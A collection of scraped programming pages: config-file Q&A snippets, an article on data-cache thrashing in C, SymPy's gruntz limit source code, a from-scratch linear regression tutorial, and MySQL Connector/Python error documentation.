Keep your app settings inside that. A dll specic config file is not required. A windows application will use App.config while a web application will use web.config. If you use your dll in a windows or console application put the setting in app.config. Dlls will always use the config file of the application they are loaded into. If you want to have a dll specific config file, you will have to load it yourself. The syntax you're implying is impossible. I can think of two ways for you to achieve this: Preload all the codes: var preloadedCodeArray = ["<%= ConfigurationManager.AppSettings[line1] %>", "<%= ConfigurationManager.AppSettings[line2] %>", "<%= ConfigurationManager.AppSettings[line3] %>"]; Or via a method that returns the wanted string: var preloadedCodeArray = ["<%= GetAllConfigurationLines() %>"]; Use AJAX calls to retrieve the wanted line (this would require of you to build a specific http-handler for handling the calls and returning the wanted code line). something in the form of: function getConfigLine(lineNum) { var config; $.ajax("../WebConfigLineHandle.ashx?line=" + lineNum, { com No, the processor directives are not available in the web.config or app.config files. Edited to add: These files are not actually compiled, and the #debug preprocessor value is used during compilation to tell the compiler what to do. "requirejs" is just an alias to the same API, since "require" is used by other libraries. From the documentation: If you just want to load some JavaScript files, use the require() API. If there is already a require() in the page, you can use requirejs() to access the RequireJS API for loading scripts. Even though it makes no technical difference, just by convention I would stay with require.config unless you have a naming conflict with some other module loader. Results as of 6-Jun-2013: (609 results) (258 results) In a word: You can't... 
However, if you already have packages.configin your repository, then it won't be ignored even if svn ignore is set to *.config. You can't ignore stuff already in the repository. However, from what you want, it sounds like you can use my pre-commit hook for finer control over your situation. My hook takes a list of rules specified in a control file. For file rules, the last rule that matches the file's name is the access they're granted. In your situation, you would have two rules: [FILE Configuration files must be named "packages.config"] file = **/*.config access = no-add users = @ALL [FILE Configuration files must be named "packages.config"] file = **/packages.config access = read-write users = @ALL If someone tried to add bob.config, to the repository, my f The following works for me: test.xml <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="" xmlns:xsi="" xmlns:context="" xmlns:dwr="" xmlns:mongo="" xsi:schemaLocation=" I don't think you need to worry about resource or performance in this situation. You should be most concerned on the functionality that you want and your users expect. If they are clicking a list item and open up say a detailed Activity for that list item then they press the back button then they probably expect to return to that list. If you call finish() then the user will return to the Activity before this one or if there are no others then they will exit the app. Is that what you want? So with what little I know about your app I would say remove finish() public void return_to_config(View view){ Intent intent = new Intent(this, ConfigActivity.class); startActivity(intent); } But if the user doesn't expect to return here when pressing "Back" button then keep it in there My solution to this was that I was looking in the wrong place. I took these steps to resolve my issue: From SQL Server Configuration Manager, I chose Protocols for MSSQLSERVER, then right clicked on that and chose Properties. From there I found the certificates tab. 
Choosing the Cert was easy - done. On restarting MSSQL I got an error and it wouldn't start. Quick Bing and traced it to the fact that the account MSSQL is running on didn't have access to that cert. I went to the Cert MMC and then from there I chose the cert, right clicked and went to All Tasks->Manage Private Keys. From there I simply gave access rights to the SQL service account. Restarted the SQL service and voila! Problem solved. Usually the mvc configuration(/WEB-INF/mvc-config.xml) contains the the beans that are needed by the controller layer (e.g. the controllers, view resolvers ...) The application configuration(classpath:spring/application-config.xml) is for the model layer (here you can define daos, services...) You can use location element example <location path="subdir1"> <system.web> <authorization> <allow users ="*" /> </authorization> </system.web> </location> As no other solutions were suggested, I created a function to modify web.config manually and copy data from smaller configs. Just in case someone finds it useful or suggests a better approach: # Changes web.config: adds into system.serviceModel group data for binding and for endpoint for the webservice Function add-config-source { Param($configFile) if(($configFile -eq "") -or ($configFile -eq $null)) { $errors = $errors + " Error: path to webservice configuration file was not found. "; } # get data from the web service config file $webServiceConfigXml = [xml](get-content $configFile) # cloning elements that we need $bindingNodeClone = $webServiceConfigXml.SelectSingleNode("//binding").Clone(); $endpointNodeClone = $webService
http://www.w3hello.com/questions/rs-reconfig-not-works-it-still-shows-the-original-config
Lead Image © Lucy Baldwin, 123RF.com

Thrashing the data cache for fun and profit

Ducks in a Row

In the past [1], I discussed how instruction cache misses can completely ruin your CPU's day when it comes to execution speed by stalling processing for thousands or even millions of cycles while program text is being retrieved from slower caches, or even from (gosh!) RAM [2] [3]. Now the time has come to turn your attention to the data cache: Where large enough datasets are involved, spatial locality and cache-friendly algorithms are among the first optimizations you should employ.

Three Times Slower

Compare the code presented in Listings 1 and 2. You might use diff [4] to verify that the only difference is in the order of the i and j variables in the array lookup.

Listing 1: row.c

    #include <stdio.h>
    #define SIZE 10000

    int array[SIZE][SIZE] = {0};

    int main() {
        for (int i = 0; i < SIZE; i++)
            for (int j = 0; j < SIZE; j++)
                array[i][j]++;
        return 0;
    }

Listing 2: column.c

    #include <stdio.h>
    #define SIZE 10000

    int array[SIZE][SIZE] = {0};

    int main() {
        for (int i = 0; i < SIZE; i++)
            for (int j = 0; j < SIZE; j++)
                array[j][i]++;
        return 0;
    }

Both listings do exactly the same thing, proceeding in what is called row-major (Listing 1) or column-major (Listing 2) order [5]. To see how this plays out in practice, compile both programs:

    gcc column.c -o column
    gcc row.c -o row

Next, run and time the execution of these logically equivalent access strategies:

    $ time ./row
    real  0m1.388s
    user  0m0.943s
    sys   0m0.444s

    $ time ./column
    real  0m4.538s
    user  0m4.068s
    sys   0m0.468s

The experiment shows the column-major code taking three and a half times longer to execute than its row-major counterpart.
That significant result is partially explained by how C, C++, and other languages "flatten" two-dimensional arrays into the one-dimensional address space exposed by RAM. As shown in Figure 1, individual rows line up sequentially in memory, something that can be easily shown with a simple program printing the dereferenced value of an incrementing pointer (Listing 3). This new program uses C pointer arithmetic (don't try this at home, as the MythBusters would say, because it is generally considered poor practice) to access and print every location in a small 2D array by linearly accessing memory. C really represents two-dimensional arrays as arrays of arrays and lays them out in row-major fashion (i.e., row by row in memory).

Listing 3: inspect.c

    #include <stdio.h>

    int a[4][5] = {        // array of 4 arrays of 5 ints each, a 4x5 matrix
        { 1, 2, 3, 4, 5 },     // row 0 initialized to 1, 2, 3, 4, 5
        { 6, 7, 8, 9, 10 },    // row 1 initialized to 6, 7, 8, 9, 10
    };                         // rows 2 onward initialized to zeros

    int main() {
        int *p = (int *)a;     // cast added: a decays to int (*)[5], not int *
        for (int i = 0; i < 20; i++)
            printf("%d, ", *p++);
        printf("\b\b \n");     // erase the trailing comma and add a newline
        return 0;
    }

Running the third program indeed produces the output one would expect:

    $ ./inspect
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
    $

The Right Neighborhood

With every row of the array weighing in at roughly 40KB (10,000 entries of 32 bits), the difference in access time reveals the nature of the underlying machine. Accessing the array in the natural order of the programming language (implementation choices may differ here, with Fortran and Matlab choosing column-major layouts) leverages the spatial locality of the access pattern, reading locations contiguous in physical memory. Conversely, using the wrong strategy produces code constantly looking up memory locations that are 40KB apart.
The first approach is cache-friendly, whereas the latter approach repeatedly evicts cache lines that were just loaded yet used to process but a single value. The more linear the memory access pattern, the easier it is for the CPU to be ready for operations, with data already in the cache when called. Memory layout and access patterns matter, and a stark demonstration of the difference between the two approaches is provided by Figure 2. The perf stat command [6] executes the command requested while gathering statistics from the CPU's performance counters. Switching between the row-major and column-major access patterns resulted in a 20-fold increase in L1 cache misses, spiking from 13 million to 273 million! The Cachegrind module of valgrind [7] measures how a program interacts with an ideal cache hierarchy by simulating a machine with independent first-level instruction and data caches (I1 and D1), backed by a unified second-level cache (L2). Although Cachegrind requires tuning to match the size of a CPU's caches, the independence of its simulations from any other process running in the system, reproducible results, and compatibility with virtual environments makes it the tool of choice when studying a cache performance issue. Figure 3 shows the results of the run, producing a 16-fold increase in data cache misses, up from 6 million to 100 million events. Note how the row-major approach delivered a near-perfect result, with D1 cache misses coming in under one percent. Fully utilizing the data loaded from the slower storage medium (RAM in this case) is a common optimization pattern. Swapping to disk is, of course, the worst case scenario, with 13,700 times the latency of the L1 cache. The situation whereupon memory pages are being offloaded to the swap device after a single variable access and then reloaded to access the next location is known as disk thrashing. 
RAM is loaded by the CPU in cache lines [8], and data is loaded from disk in full pages; whenever possible, make full use of all their data before moving on to the next.

Infos

- "Heavy Rotation" by Federico Lucifredi, ADMIN, issue 14, 2013, pg. 88
- Visualization of L1, L2, RAM, and disk latencies:
- Interactive visualization of cache speeds:
- diff (1) man page:
- Row- and column-major order:
- perf stat (1) man page:
- Cachegrind manual:
- CPU cache:
https://www.admin-magazine.com/Archive/2019/54/Thrashing-the-data-cache-for-fun-and-profit/(tagID)/24
/ """ Limits ====== Implemented according to the PhD thesis, which contains very thorough descriptions of the algorithm including many examples. We summarize here the gist of it. All functions are sorted according to how rapidly varying they are at infinity using the following rules. Any two functions f and g can be compared using the properties of L: L=lim log|f(x)| / log|g(x)| (for x -> oo) We define >, < ~ according to:: 1. f > g .... L=+-oo we say that: - f is greater than any power of g - f is more rapidly varying than g - f goes to infinity/zero faster than g 2. f < g .... L=0 we say that: - f is lower than any power of g 3. f ~ g .... L!=0, +-oo we say that: - both f and g are bounded from above and below by suitable integral powers of the other Examples ======== :: 2 < x < exp(x) < exp(x**2) < exp(exp(x)) 2 ~ 3 ~ -5 x ~ x**2 ~ x**3 ~ 1/x ~ x**m ~ -x exp(x) ~ exp(-x) ~ exp(2x) ~ exp(x)**2 ~ exp(x+exp(-x)) f ~ 1/f So we can divide all the functions into comparability classes (x and x^2 belong to one class, exp(x) and exp(-x) belong to some other class). In principle, we could compare any two functions, but in our algorithm, we don't compare anything below the class 2~3~-5 (for example log(x) is below this), so we set 2~3~-5 as the lowest comparability class. Given the function f, we find the list of most rapidly varying (mrv set) subexpressions of it. This list belongs to the same comparability class. Let's say it is {exp(x), exp(2x)}. Using the rule f ~ 1/f we find an element "w" (either from the list or a new one) from the same comparability class which goes to zero at infinity. In our example we set w=exp(-x) (but we could also set w=exp(-2x) or w=exp(-3x) ...). We rewrite the mrv set using w, in our case {1/w, 1/w^2}, and substitute it into f. Then we expand f into a series in w:: f = c0*w^e0 + c1*w^e1 + ... 
+ O(w^en), where e0<e1<...<en, c0!=0 but for x->oo, lim f = lim c0*w^e0, because all the other terms go to zero, because w goes to zero faster than the ci and ei. So:: for e0>0, lim f = 0 for e0<0, lim f = +-oo (the sign depends on the sign of c0) for e0=0, lim f = lim c0 We need to recursively compute limits at several places of the algorithm, but as is shown in the PhD thesis, it always finishes. Important functions from the implementation: compare(a, b, x) compares "a" and "b" by computing the limit L. mrv(e, x) returns list of most rapidly varying (mrv) subexpressions of "e" rewrite(e, Omega, x, wsym) rewrites "e" in terms of w leadterm(f, x) returns the lowest power term in the series of f mrv_leadterm(e, x) returns the lead term (c0, e0) for e limitinf(e, x) computes lim e (for x->oo) limit(e, z, z0) computes any limit by converting it to the case x->oo All the functions are really simple and straightforward except rewrite(), which is the most difficult/complex part of the algorithm. When the algorithm fails, the bugs are usually in the series expansion (i.e. in SymPy) or in rewrite. This code is almost exact rewrite of the Maple code inside the Gruntz thesis. Debugging --------- Because the gruntz algorithm is highly recursive, it's difficult to figure out what went wrong inside a debugger. Instead, turn on nice debug prints by defining the environment variable SYMPY_DEBUG. 
For example:

[user@localhost]: SYMPY_DEBUG=True ./bin/isympy

In [1]: limit(sin(x)/x, x, 0)
limitinf(_x*sin(1/_x), _x) = 1
+-mrv_leadterm(_x*sin(1/_x), _x) = (1, 0)
| +-mrv(_x*sin(1/_x), _x) = set([_x])
| | +-mrv(_x, _x) = set([_x])
| | +-mrv(sin(1/_x), _x) = set([_x])
| |   +-mrv(1/_x, _x) = set([_x])
| |     +-mrv(_x, _x) = set([_x])
| +-mrv_leadterm(exp(_x)*sin(exp(-_x)), _x, set([exp(_x)])) = (1, 0)
|   +-rewrite(exp(_x)*sin(exp(-_x)), set([exp(_x)]), _x, _w) = (1/_w*sin(_w), -_x)
|     +-sign(_x, _x) = 1
|   +-mrv_leadterm(1, _x) = (1, 0)
+-sign(0, _x) = 0
+-limitinf(1, _x) = 1

And check manually which line is wrong. Then go to the source code and debug
this function to figure out the exact problem.
"""
from __future__ import print_function, division

from sympy.core import Basic, S, oo, Symbol, I, Dummy, Wild, Mul
from sympy.functions import log, exp
from sympy.series.order import Order
from sympy.simplify.powsimp import powsimp
from sympy import cacheit

from sympy.core.compatibility import reduce

from sympy.utilities.timeutils import timethis
timeit = timethis('gruntz')

from sympy.utilities.misc import debug_decorator as debug


def compare(a, b, x):
    """Returns "<" if a<b, "=" for a == b, ">" for a>b"""
    # log(exp(...)) must always be simplified here for termination
    la, lb = log(a), log(b)
    if isinstance(a, Basic) and a.func is exp:
        la = a.args[0]
    if isinstance(b, Basic) and b.func is exp:
        lb = b.args[0]

    c = limitinf(la/lb, x)
    if c == 0:
        return "<"
    elif c.is_infinite:
        return ">"
    else:
        return "="


class SubsSet(dict):
    """.
""" def __init__(self): self.rewrites = {} def __repr__(self): return super(SubsSet, self).__repr__() + ', ' + self.rewrites.__repr__() def __getitem__(self, key): if not key in self: self[key] = Dummy() return dict.__getitem__(self, key) def do_subs(self, e): for expr, var in self.items(): e = e.subs(var, expr) return e@debug[docs] def meets(self, s2): """Tell whether or not self and s2 have non-empty intersection""" return set(self.keys()).intersection(list(s2.keys())) != set()[docs] def union(self, s2, exps=None): """Compute the union of self and s2, adjusting exps""" res = self.copy() tr = {} for expr, var in s2.items(): if expr in self: if exps: exps = exps.subs(var, res[expr]) tr[var] = res[expr] else: res[expr] = var for var, rewr in s2.rewrites.items(): res.rewrites[var] = rewr.subs(tr) return res, expsdef copy(self): r = SubsSet() r.rewrites = self.rewrites.copy() for expr, var in self.items(): r[expr] = var return r[docs]def mrv(e, x): """Returns a SubsSet of most rapidly varying (mrv) subexpressions of 'e', and e rewritten in terms of these""" e = powsimp(e, deep=True, combine='exp') if not isinstance(e, Basic): raise TypeError("e should be an instance of Basic") if not e.has(x): return SubsSet(), e elif e == x: s = SubsSet() return s, s[x] elif e.is_Mul or e.is_Add: i, d = e.as_independent(x) # throw away x-independent terms if d.func != e.func: s, expr = mrv(d, x) return s, e.func(i, expr) a, b = d.as_two_terms() s1, e1 = mrv(a, x) s2, e2 = mrv(b, x) return mrv_max1(s1, s2, e.func(i, e1, e2), x) elif e.is_Pow: b, e = e.as_base_exp() if e.has(x): return mrv(exp(e * log(b)), x) else: s, expr = mrv(b, x) return s, expr**e elif e.func is log: s, expr = mrv(e.args[0], x) return s, log(expr) elif e.func is exp: # We know from the theory of this algorithm that exp(log(...)) may always # be simplified here, and doing so is vital for termination. 
if e.args[0].func is log: return mrv(e.args[0].args[0], x) # if a product has an infinite factor the result will be # infinite if there is no zero, otherwise NaN; here, we # consider the result infinite if any factor is infinite li = limitinf(e.args[0], x) if any(_.is_infinite for _ in Mul.make_args(li)): s1 = SubsSet() e1 = s1[e] s2, e2 = mrv(e.args[0], x) su = s1.union(s2)[0] su.rewrites[e1] = exp(e2) return mrv_max3(s1, e1, s2, exp(e2), su, e1, x) else: s, expr = mrv(e.args[0], x) return s, exp(expr) elif e.is_Function: l = [mrv(a, x) for a in e.args] l2 = [s for (s, _) in l if s != SubsSet()] if len(l2) != 1: # e.g. something like BesselJ(x, x) raise NotImplementedError("MRV set computation for functions in" " several variables not implemented.") s, ss = l2[0], SubsSet() args = [ss.do_subs(x[1]) for x in l] return s, e.func(*args) elif e.is_Derivative: raise NotImplementedError("MRV set computation for derviatives" " not implemented yet.") return mrv(e.args[0], x) raise NotImplementedError( "Don't know how to calculate the mrv of '%s'" % e)[docs]def mrv_max3(f, expsf, g, expsg, union, expsboth, x): ""]. """ if not isinstance(f, SubsSet): raise TypeError("f should be an instance of SubsSet") if not isinstance(g, SubsSet): raise TypeError("g should be an instance of SubsSet") if f == SubsSet(): return g, expsg elif g == SubsSet(): return f, expsf elif f.meets(g): return union, expsboth c = compare(list(f.keys())[0], list(g.keys())[0], x) if c == ">": return f, expsf elif c == "<": return g, expsg else: if c != "=": raise ValueError("c should be =") return union, expsboth[docs]def mrv_max1(f, g, exps, x): "". """ u, b = f.union(g, exps) return mrv_max3(f, g.do_subs(exps), g, f.do_subs(exps), u, b, x)@debug @cacheit @timeit[docs]def sign(e, x): """.] 
""" from sympy import sign as _sign if not isinstance(e, Basic): raise TypeError("e should be an instance of Basic") if e.is_positive: return 1 elif e.is_negative: return -1 elif e.is_zero: return 0 elif not e.has(x): return _sign(e) elif e == x: return 1 elif e.is_Mul: a, b = e.as_two_terms() sa = sign(a, x) if not sa: return 0 return sa * sign(b, x) elif e.func is exp: return 1 elif e.is_Pow: s = sign(e.base, x) if s == 1: return 1 if e.exp.is_Integer: return s**e.exp elif e.func is log: return sign(e.args[0] - 1, x) # if all else fails, do it the hard way c0, e0 = mrv_leadterm(e, x) return sign(c0, x)@debug @timeit @cacheit[docs]def limitinf(e, x): """Limit e(x) for x-> oo""" #rewrite e in terms of tractable functions only e = e.rewrite('tractable', deep=True) if not e.has(x): return e # e is a constant if e.has(Order): e = e.expand().removeO() if not x.is_positive: # We make sure that x.is_positive is True so we # get all the correct mathematical behavior from the expression. # We need a fresh variable. p = Dummy('p', positive=True, finite=True) e = e.subs(x, p) x = p c0, e0 = mrv_leadterm(e, x) sig = sign(e0, x) if sig == 1: return S.Zero # e0>0: lim f = 0 elif sig == -1: # e0<0: lim f = +-oo (the sign depends on the sign of c0) if c0.match(I*Wild("a", exclude=[I])): return c0*oo s = sign(c0, x) #the leading term shouldn't be 0: if s == 0: raise ValueError("Leading term should not be 0") return s*oo elif sig == 0: return limitinf(c0, x) # e0=0: lim f = lim c0def moveup2(s, x): r = SubsSet() for expr, var in s.items(): r[expr.subs(x, exp(x))] = var for var, expr in s.rewrites.items(): r.rewrites[var] = s.rewrites[var].subs(x, exp(x)) return r def moveup(l, x): return [e.subs(x, exp(x)) for e in l] @debug @timeit[docs]def calculate_series(e, x, logx=None): """ Calculates at least one term of the series of "e" in "x". This is a place that fails most often, so it is in its own function. 
""" from sympy.polys import cancel for t in e.lseries(x, logx=logx): t = cancel(t) if t.simplify(): break return t@debug @timeit @cacheit[docs]def mrv_leadterm(e, x): """Returns (c0, e0) for e.""" Omega = SubsSet() if not e.has(x): return (e, S.Zero) if Omega == SubsSet(): Omega, exps = mrv(e, x) if not Omega: # e really does not depend on x after simplification series = calculate_series(e, x) c0, e0 = series.leadterm(x) if e0 != 0: raise ValueError("e0 should be 0") return c0, e0 if x in Omega: #move the whole omega up (exponentiate each term): Omega_up = moveup2(Omega, x) e_up = moveup([e], x)[0] exps_up = moveup([exps], x)[0] # NOTE: there is no need to move this down! e = e_up Omega = Omega_up exps = exps_up # # The positive dummy, w, is used here so log(w*2) etc. will expand; # a unique dummy is needed in this algorithm # # For limits of complex functions, the algorithm would have to be # improved, or just find limits of Re and Im components separately. # w = Dummy("w", real=True, positive=True, finite=True) f, logw = rewrite(exps, Omega, x, w) series = calculate_series(f, w, logx=logw) return series.leadterm(w)[docs]def build_expression_tree(Omega, rewrites): r""". """ class Node: def ht(self): return reduce(lambda x, y: x + y, [x.ht() for x in self.before], 1) nodes = {} for expr, v in Omega: n = Node() n.before = [] n.var = v n.expr = expr nodes[v] = n for _, v in Omega: if v in rewrites: n = nodes[v] r = rewrites[v] for _, v2 in Omega: if r.has(v2): n.before.append(nodes[v2]) return nodes@debug @timeit[docs]def rewrite(e, Omega, x, wsym): """e(x) ... the function Omega ... the mrv set wsym ... the symbol which is going to be used for w Returns the rewritten e in terms of w and log(w). See test_rewrite1() for examples and correct results. 
""" from sympy import ilcm if not isinstance(Omega, SubsSet): raise TypeError("Omega should be an instance of SubsSet") if len(Omega) == 0: raise ValueError("Length can not be 0") #all items in Omega must be exponentials for t in Omega.keys(): if not t.func is exp: raise ValueError("Value should be exp") rewrites = Omega.rewrites Omega = list(Omega.items()) nodes = build_expression_tree(Omega, rewrites) Omega.sort(key=lambda x: nodes[x[1]].ht(), reverse=True) # make sure we know the sign of each exp() term; after the loop, # g is going to be the "w" - the simplest one in the mrv set for g, _ in Omega: sig = sign(g.args[0], x) if sig != 1 and sig != -1: raise NotImplementedError('Result depends on the sign of %s' % sig) if sig == 1: wsym = 1/wsym # if g goes to oo, substitute 1/w #O2 is a list, which results by rewriting each item in Omega using "w" O2 = [] denominators = [] for f, var in Omega: c = limitinf(f.args[0]/g.args[0], x) if c.is_Rational: denominators.append(c.q) arg = f.args[0] if var in rewrites: if not rewrites[var].func is exp: raise ValueError("Value should be exp") arg = rewrites[var].args[0] O2.append((var, exp((arg - c*g.args[0]).expand())*wsym**c)) #Remember that Omega contains subexpressions of "e". So now we find #them in "e" and substitute them for our rewriting, stored in O2 # the following powsimp is necessary to automatically combine exponentials, # so that the .subs() below succeeds: # TODO this should not be necessary f = powsimp(e, deep=True, combine='exp') for a, b in O2: f = f.subs(a, b) for _, var in Omega: assert not f.has(var) #finally compute the logarithm of w (logw). logw = g.args[0] if sig == 1: logw = -logw # log(w)->log(1/w)=-log(w) # Some parts of sympy have difficulty computing series expansions with # non-integral exponents. The following heuristic improves the situation: exponent = reduce(ilcm, denominators, 1) f = f.subs(wsym, wsym**exponent) logw /= exponent return f, logw[docs]def gruntz(e, z, z0, dir="+"): """. 
""" if not isinstance(z, Symbol): raise NotImplementedError("Second argument must be a Symbol") #convert all limits to the limit z->oo; sign of z is handled in limitinf r = None if z0 == oo: r = limitinf(e, z) elif z0 == -oo: r = limitinf(e.subs(z, -z), z) else: if str(dir) == "-": e0 = e.subs(z, z0 - 1/z) elif str(dir) == "+": e0 = e.subs(z, z0 + 1/z) else: raise NotImplementedError("dir must be '+' or '-'") r = limitinf(e0, z) # This is a bit of a heuristic for nice results... we always rewrite # tractable functions in terms of familiar intractable ones. # It might be nicer to rewrite the exactly to what they were initially, # but that would take some work to implement. return r.rewrite('intractable', deep=True)
https://docs.sympy.org/1.0/_modules/sympy/series/gruntz.html
CC-MAIN-2019-09
refinedweb
2,765
67.25
3.2. Linear Regression Implementation from Scratch¶

Now that you understand the key ideas behind linear regression, we can begin to work through a hands-on implementation in code. In this section, we will implement the entire method from scratch, including the data pipeline, the model, the loss function, and the gradient descent optimizer. While modern deep learning frameworks can automate nearly all of this work, implementing things from scratch is the only way to make sure that you really know what you are doing. Moreover, when it comes time to customize models, defining our own layers, loss functions, etc., understanding how things work under the hood will prove handy. In this section, we will rely only on ndarray and autograd. Afterwards, we will introduce a more compact implementation, taking advantage of Gluon's bells and whistles. To start off, we import the few required packages.

%matplotlib inline
import d2l
from mxnet import autograd, np, npx
import random
npx.set_np()

3.2.1. Generating the Dataset¶

To keep things simple, we will construct an artificial dataset according to a linear model with additive noise. Our task will be to recover this model's parameters using the finite set of examples contained in our dataset. We will keep the data low-dimensional so we can visualize it easily. In the following code snippet, we generate a dataset containing \(1000\) examples, each consisting of \(2\) features sampled from a standard normal distribution. Thus our synthetic dataset will be an object \(\mathbf{X}\in \mathbb{R}^{1000 \times 2}\). The true parameters generating our data will be \(\mathbf{w} = [2, -3.4]^\top\) and \(b = 4.2\) and our synthetic labels will be assigned according to the following linear model with noise term \(\epsilon\):

\(\mathbf{y} = \mathbf{X}\mathbf{w} + b + \mathbf{\epsilon}\)

You could think of \(\epsilon\) as capturing potential measurement errors on the features and labels.
We will assume that the standard assumptions hold and thus that \(\epsilon\) obeys a normal distribution with mean of \(0\). To make our problem easy, we will set its standard deviation to \(0.01\). The following code generates our synthetic dataset:

# Saved in the d2l package for later use
def synthetic_data(w, b, num_examples):
    """generate y = X w + b + noise"""
    X = np.random.normal(0, 1, (num_examples, len(w)))
    y = np.dot(X, w) + b
    y += np.random.normal(0, 0.01, y.shape)
    return X, y

true_w = np.array([2, -3.4])
true_b = 4.2
features, labels = synthetic_data(true_w, true_b, 1000)

Note that each row in features consists of a 2-dimensional data point and that each row in labels consists of a 1-dimensional target value (a scalar).

print('features:', features[0],'\nlabel:', labels[0])

features: [2.2122064 1.1630787]
label: 4.662078

3.2.2. Reading the Dataset¶

Recall that training models consists of making multiple passes over the dataset, grabbing one minibatch of examples at a time, and using them to update our model. Since this process is so fundamental to training machine learning algorithms, it's worth defining a utility function to shuffle the data and access it in minibatches.

In the following code, we define a data_iter function to demonstrate one possible implementation of this functionality. The function takes a batch size, a design matrix, and a vector of labels, yielding minibatches of size batch_size. Each minibatch consists of a tuple of features and labels.

def data_iter(batch_size, features, labels):
    num_examples = len(features)
    indices = list(range(num_examples))
    # The examples are read at random, in no particular order
    random.shuffle(indices)
    for i in range(0, num_examples, batch_size):
        batch_indices = np.array(
            indices[i: min(i + batch_size, num_examples)])
        yield features[batch_indices], labels[batch_indices]

The shape of the features in each minibatch tells us both the minibatch size and the number of input features. Likewise, our minibatch of labels will have a shape given by batch_size.
batch_size = 10

for X, y in data_iter(batch_size, features, labels):
    print(X, '\n', y)
    break

[[ 0.34832358  0.2571885 ]
 [ 0.37233776  0.9486392 ]
 [ 1.3729066  -0.97025216]
 [-1.1113098  -0.30177692]
 [ 1.006013   -0.8167455 ]
 [-1.024502    0.61664087]
 [-1.136135    0.38869882]
 [-0.9727549   0.9702775 ]
 [-0.37305322 -0.1837693 ]
 [ 1.4576826  -0.9084958 ]]
[ 4.0371156   1.730985   10.245152    3.017058    8.986096    0.06695576
  0.6105237  -1.0496663   4.0894604  10.198601  ]

As we run the iterator, we obtain distinct minibatches successively until all the data has been exhausted (try this). While the iterator implemented above is good for didactic purposes, it is inefficient in ways that might get us in trouble on real problems. For example, it requires that we load all data in memory and that we perform lots of random memory access. The built-in iterators implemented in Apache MXNet are considerably more efficient and they can deal both with data stored on file and data fed via a data stream.

3.2.3. Initializing Model Parameters¶

We initialize the weights by sampling random numbers from a normal distribution with mean 0 and standard deviation 0.01, and set the bias to zero:

w = np.random.normal(0, 0.01, (2, 1))
b = np.zeros(1)

Now that we have initialized our parameters, our next task is to update them until they fit our data sufficiently well. Each update requires taking the gradient (a multi-dimensional derivative) of our loss function with respect to the parameters. Given this gradient, we can update each parameter in the direction that reduces the loss. Since nobody wants to compute gradients explicitly (this is tedious and error prone), we use automatic differentiation to compute the gradient. See Section 2.5.

3.2.4. Defining the Model¶

Next, we define our model, relating its inputs and parameters to its outputs. Note that np.dot(X, w) is a vector and b is a scalar. Recall that when we add a vector and a scalar, the scalar is added to each component of the vector.

# Saved in the d2l package for later use
def linreg(X, w, b):
    return np.dot(X, w) + b

3.2.5. Defining the Loss Function¶

# Saved in the d2l package for later use
def squared_loss(y_hat, y):
    return (y_hat - y.reshape(y_hat.shape)) ** 2 / 2

3.2.6.
Defining the Optimization Algorithm¶

As we discussed in the previous section, linear regression has a closed-form solution. However, this is not a book about linear regression, it is a book about deep learning, so here we will use minibatch stochastic gradient descent. At each step, using one minibatch randomly drawn from our dataset, we will estimate the gradient of the loss with respect to our parameters. Next, we will update our parameters (a small amount) in the direction that reduces the loss. Recall from Section 2.5 that after we call backward, each parameter (param) will have its gradient stored in its .grad attribute. Because our loss is calculated as a sum over the minibatch, we normalize the step size by the batch size (batch_size), so that the magnitude of a typical update does not depend heavily on our choice of the batch size.

# Saved in the d2l package for later use
def sgd(params, lr, batch_size):
    for param in params:
        param[:] = param - lr * param.grad / batch_size

3.2.7. Training¶

Now that we have all of the parts in place, we are ready to implement the main training loop. It is crucial that you understand this code because you will see nearly identical training loops over and over again throughout your career in deep learning. In each iteration, we will grab minibatches of training examples, first passing them through our model to obtain a set of predictions. After calculating the loss, we call the backward function to initiate the backwards pass through the network, storing the gradients with respect to each parameter in its corresponding .grad attribute. Finally, we will call the optimization algorithm sgd to update the model parameters. Since we previously set the batch size batch_size to \(10\), the shape of the loss l for each minibatch is (\(10\), \(1\)). In summary, we will execute the following loop:

lr = 0.03
num_epochs = 3
net = linreg
loss = squared_loss

for epoch in range(num_epochs):
    # Assuming the number of examples can be divided by the batch size, all
    # the examples in the training dataset are used once in one epoch
    # iteration. The features and tags of minibatch examples are given by X
    # and y respectively
    for X, y in data_iter(batch_size, features, labels):
        with autograd.record():
            l = loss(net(X, w, b), y)  # Minibatch loss in X and y
        l.backward()  # Compute gradient on l with respect to [w, b]
        sgd([w, b], lr, batch_size)  # Update parameters using their gradient
    train_l = loss(net(features, w, b), labels)
    print('epoch %d, loss %f' % (epoch + 1, float(train_l.mean())))

epoch 1, loss 0.024955
epoch 2, loss 0.000089
epoch 3, loss 0.000051

In this case, because we synthesized the data ourselves, we know precisely what the true parameters are. Thus, we can evaluate our success in training by comparing the true parameters with those that we learned:

print('Error in estimating w', true_w.reshape(w.shape) - w)
print('Error in estimating b', true_b - b)

Error in estimating w [[ 0.00041616] [-0.00010514]]
Error in estimating b [0.00035763]

Note that we should not take it for granted that we are able to recover the parameters accurately. This only happens for a special category of problems: strongly convex optimization problems with "enough" data to ensure that the noisy samples allow us to recover the underlying dependency. Even in such cases, stochastic gradient descent can often find remarkably good solutions, owing partly to the fact that, for deep networks, there exist many configurations of the parameters that lead to accurate prediction.
https://d2l.ai/chapter_linear-networks/linear-regression-scratch.html
This exception is the base class for all other exceptions in the errors module. It can be used to catch all errors in a single except statement. The following example shows how we could catch syntax errors: import mysql.connector try: cnx = mysql.connector.connect(user='scott', database='employees') cursor = cnx.cursor() cursor.execute("SELECT * FORM employees") # Syntax error in query cnx.close() except mysql.connector.Error as err: print("Something went wrong: {}".format(err)) Initializing the exception supports a few optional arguments, namely msg, errno, values and sqlstate. All of them are optional and default to None. errors.Error is internally used by Connector/Python to raise MySQL client and server errors and should not be used by your application to raise exceptions. The following examples show the result when using no arguments or a combination of the arguments: >>> from mysql.connector.errors import Error >>> str(Error()) 'Unknown error' >>> str(Error("Oops! There was an error.")) 'Oops! There was an error.' >>> str(Error(errno=2006)) '2006: MySQL server has gone away' >>> str(Error(errno=2002, values=('/tmp/mysql.sock', 2))) "2002: Can't connect to local MySQL server through socket '/tmp/mysql.sock' (2)" >>> str(Error(errno=1146, sqlstate='42S02', msg="Table 'test.spam' doesn't exist")) "1146 (42S02): Table 'test.spam' doesn't exist" The example which uses error number 1146 is used when Connector/Python receives an error packet from the MySQL Server. The information is parsed and passed to the Error exception as shown. Each exception subclassing from Error can be initialized using the previously mentioned arguments. Additionally, each instance 